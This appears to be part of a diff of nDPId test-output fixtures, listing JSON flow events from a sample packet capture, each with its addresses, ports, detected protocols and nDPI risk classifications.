00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00621{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -584,7 +584,7 @@
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -596,7 +596,7 @@
00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -607,31 +607,31 @@
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
